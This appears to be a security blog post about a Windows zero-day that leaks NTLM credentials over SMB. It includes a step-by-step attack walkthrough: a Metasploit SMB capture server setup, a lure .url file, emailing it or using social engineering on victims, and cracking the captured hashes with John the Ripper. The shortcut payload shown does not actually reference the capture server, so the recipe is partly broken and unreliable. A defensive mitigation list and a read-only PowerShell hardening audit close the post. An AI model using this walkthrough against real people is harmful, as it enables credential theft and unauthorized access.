A new zero-day vulnerability has been discovered that allows attackers to capture NTLM credentials by simply tricking the target into viewing a malicious file in Windows Explorer.
The flaw was discovered by the 0patch team, a platform that provides unofficial support for end-of-life Windows versions, and was reported to Microsoft. However, no official fix has been released yet.
According to 0patch, the issue, which currently has no CVE ID, impacts all Windows versions from Windows 7 and Server 2008 R2 up to the latest Windows 11 24H2 and Server 2022.
In this attack the NTLM authentication is carried over SMB (Server Message Block), which by default uses TCP port 445. If hosts are allowed to make outbound connections on this port, an attacker-controlled SMB server can collect leaked NTLM credentials, especially from machines on untrusted networks. Captured credentials can then be used for unauthorized access to sensitive systems and, combined with other attack vectors, for further actions such as lateral movement or establishing command-and-control (C&C) infrastructure. Restricting outbound access on port 445 is therefore a key mitigation.
An exploit that might work (this is for educational purposes; hacking is bad, don't hack).
1. Set Up the Metasploit Listener
Start Metasploit:
msfconsole
Use the auxiliary module to create a malicious SMB server:
use auxiliary/server/capture/smb
set SRVHOST <your_attack_machine_IP>
set SRVPORT 445
set JOHNPWFILE /tmp/hashes.john
set CHALLENGE 1122334455667788
run
This creates an SMB server to capture NTLMv2 hashes when a Windows user connects to it.
2. Create a Malicious File
Craft a file containing a link to your SMB server. For example:
[InternetShortcut]
URL=file:///fake
Save the file as something enticing, e.g., ReadMe.url.
3. Host or Distribute the Malicious File
- Email the malicious .url file to the victim.
- Host it on a shared drive or external USB.
- Use social engineering to trick the user into opening the file.
4. Capture NTLM Hashes
Monitor your Metasploit or Responder console for NTLM hash captures.
5. Crack NTLM Hashes
Use John the Ripper to crack captured hashes:
john /tmp/hashes.john --wordlist=/usr/share/wordlists/rockyou.txt
Defensive Measures:
- Disable NTLM authentication on Windows systems.
- Regularly apply Windows updates.
- Use SMB signing to mitigate NTLM relay attacks.
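The script below audits a single host for the measures above and for the outbound port-445 exposure discussed earlier. It is an added example, not part of the original post or of 0patch's work; it assumes an elevated PowerShell session on Windows 8.1 / Server 2012 R2 or newer (for the Smb* and NetFirewall cmdlets) and reads only the standard policy registry locations. It changes nothing; it only reports gaps.

```powershell
# Added example: read-only audit of NTLM / SMB hardening on the local host.
# Assumes an elevated session; nothing is modified.
$findings = @()

# 1. NTLM restriction. Policy "Restrict NTLM: Outgoing NTLM traffic to remote servers":
#    0 = allow all, 1 = audit all, 2 = deny all (value absent means the OS default, 0).
$msv = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
$outgoing = (Get-ItemProperty -Path $msv -Name RestrictSendingNTLMTraffic -ErrorAction SilentlyContinue).RestrictSendingNTLMTraffic
if ($outgoing -ne 2) {
    $findings += "Outgoing NTLM to remote servers is not denied (RestrictSendingNTLMTraffic = '$outgoing'; 2 = deny all)"
}

#    LmCompatibilityLevel 5 = send NTLMv2 only and refuse LM/NTLMv1 responses.
#    Absent value means the OS default (3 on current Windows versions).
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$lmcl = (Get-ItemProperty -Path $lsa -Name LmCompatibilityLevel -ErrorAction SilentlyContinue).LmCompatibilityLevel
if ($null -eq $lmcl) {
    $findings += "LmCompatibilityLevel is not set (OS default applies); 5 (NTLMv2 only) recommended"
} elseif ($lmcl -lt 5) {
    $findings += "LmCompatibilityLevel is $lmcl; 5 (NTLMv2 only) recommended"
}

# 2. SMB signing must be required on both the client and the server side,
#    otherwise a captured authentication can still be relayed to unsigned hosts.
if (-not (Get-SmbClientConfiguration).RequireSecuritySignature) {
    $findings += "SMB client does not require signing (Set-SmbClientConfiguration -RequireSecuritySignature `$true)"
}
if (-not (Get-SmbServerConfiguration).RequireSecuritySignature) {
    $findings += "SMB server does not require signing (Set-SmbServerConfiguration -RequireSecuritySignature `$true)"
}

# 3. Outbound TCP 445: look for any enabled block rule whose remote port covers 445.
#    (Only the host firewall is inspected; a perimeter block is outside this script's view.)
$block445 = Get-NetFirewallRule -Direction Outbound -Action Block -Enabled True -ErrorAction SilentlyContinue |
    Where-Object { ($_ | Get-NetFirewallPortFilter).RemotePort -contains '445' }
if (-not $block445) {
    $findings += "No enabled host-firewall rule blocks outbound TCP 445"
}

# 4. Patch level: report the newest installed update so it can be compared with the
#    vendor fix once one ships (the flaw had no official patch at the time of writing).
$latest = Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 1
Write-Host ("Most recent update: {0} ({1})" -f $latest.HotFixID, $latest.InstalledOn)

if ($findings.Count -eq 0) { Write-Host 'No gaps found for the audited settings.' }
else { $findings | ForEach-Object { Write-Warning $_ } }
```

Run it on a sample of workstations before rolling the policies out domain-wide, since denying outgoing NTLM (value 2) breaks access to servers that only accept NTLM; use audit mode (value 1) first and review the resulting NTLM audit events.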
